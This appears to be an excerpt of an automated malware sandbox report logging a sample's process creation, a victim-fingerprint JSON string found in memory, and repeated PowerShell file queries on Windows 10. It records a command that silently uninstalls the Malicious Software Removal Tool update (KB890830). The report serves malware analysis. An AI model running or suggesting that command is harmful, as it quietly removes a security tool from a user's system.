Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart

Source: conhost.exe, 00000019.00000002.3065565721.0000016476A95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager \| C:\Windows\explorer.exe889-028
Source: conhost.exe, 00000019.00000002.3065565721.0000016476A95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager \| C:\\Windows\\explorer.exe"}
Source: conhost.exe, 00000019.00000002.3065565721.0000016476A95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager \| C:\Windows\explorer.exe
Source: conhost.exe, 00000019.00000002.3065565721.0000016476A95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 3.4.3","vram":"0","windowTitle":"Program Manager \| C:\\Windows\\explorer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
